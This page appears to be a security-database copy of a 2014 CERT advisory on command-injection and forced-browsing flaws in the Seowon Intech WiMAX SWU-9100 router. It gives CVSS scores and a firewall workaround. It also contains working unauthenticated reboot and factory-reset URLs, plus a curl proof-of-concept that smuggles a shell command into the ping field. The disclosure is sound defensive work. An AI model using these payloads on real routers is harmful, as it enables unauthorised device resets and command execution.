Executive Summary

Summary
Title Seowon Intech WiMAX SWU-9100 mobile router contains multiple vulnerabilities
Informations
Name VU#431726 First vendor Publication 2014-02-03
Vendor VU-CERT Last vendor Modification 2014-02-11
Severity (Vendor) N/A Revision M

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitabality Sub Score NA
 
Calculate full CVSS 3.0 Vectors scores

Security-Database Scoring CVSS v2

Cvss vector : (AV:A/AC:L/Au:N/C:C/I:C/A:C)
Cvss Base Score 8.3 Attack Range Adjacent network
Cvss Impact Score 10 Attack Complexity Low
Cvss Expoit Score 6.5 Authentication None Required
Calculate full CVSS 2.0 Vectors scores

Detail

Vulnerability Note VU#431726

Seowon Intech WiMAX SWU-9100 mobile router contains multiple vulnerabilities

Original Release date: 03 Feb 2014 | Last revised: 11 Feb 2014

Overview

Seowon Intech WiMAX SWU-9100 mobile routers contain command injection (CWE-77) and direct request (CWE-425) vulnerabilities.

Description

Seowon Intech WiMAX SWU-9100 mobile routers contain command injection (CWE-77) and direct request (CWE-425) vulnerabilities.

CVE-2013-7183 - CWE-425: Direct Request ('Forced Browsing')
A remote unauthenticated attacker may factory reset or reboot the router by visiting a specific URL.
http://[IP_Router]/cgi-bin/reboot.cgi?select_option_value=factory_default&reboot_option=on&action=Apply
http://[IP_Router]/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply

CVE-2013-7179 - CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
The following is a proof-of-concept for the command injection vulnerability.
curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls -lash /etc%23&ping_count=1&action=Apply&html_view=ping" "http://[IP_Router]/cgi-bin/diagnostic.cgi" > /dev/null

The CVSS score below is for CVE-2013-7179.

Impact

A remote unauthenticated attacker may be able to inject commands, reboot, or may perform a factory reset on the device.

Solution

We are currently unaware of a practical solution to this problem. Please consider the following workaround.

Restrict Access

Enable firewall rules so only trusted sources may access the device. Do not allow web administration from the WAN interface.

Vendor Information (Learn More)

VendorStatusDate NotifiedDate Updated
Seowon Intech IncAffected09 Jan 201403 Feb 2014
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

GroupScoreVector
Base8.3AV:A/AC:L/Au:N/C:C/I:C/A:C
Temporal6.4E:POC/RL:W/RC:UC
Environmental1.6CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

References

  • http://www.seowonintech.co.kr/en/product/detail.asp?num=117&big_kind=B04&middle_kind=B04_07
  • http://cwe.mitre.org/data/definitions/77.html
  • http://cwe.mitre.org/data/definitions/425.html

Credit

Thanks to Josue Rojas for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

  • CVE IDs:CVE-2013-7179CVE-2013-7183
  • Date Public:03 Feb 2014
  • Date First Published:03 Feb 2014
  • Date Last Updated:11 Feb 2014
  • Document Revision:22

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Original Source

Url : http://www.kb.cert.org/vuls/id/431726

CWE : Common Weakness Enumeration

% Id Name
50 % CWE-287 Improper Authentication
50 % CWE-20 Improper Input Validation

CPE : Common Platform Enumeration

TypeDescriptionCount
Hardware 1

Alert History

If you want to see full details history, please login or register.
0
1
2
3
Date Informations
2014-02-12 00:18:19
  • Multiple Updates
2014-02-05 13:23:04
  • Multiple Updates
2014-02-04 13:22:19
  • Multiple Updates
2014-02-03 21:19:12
  • First insertion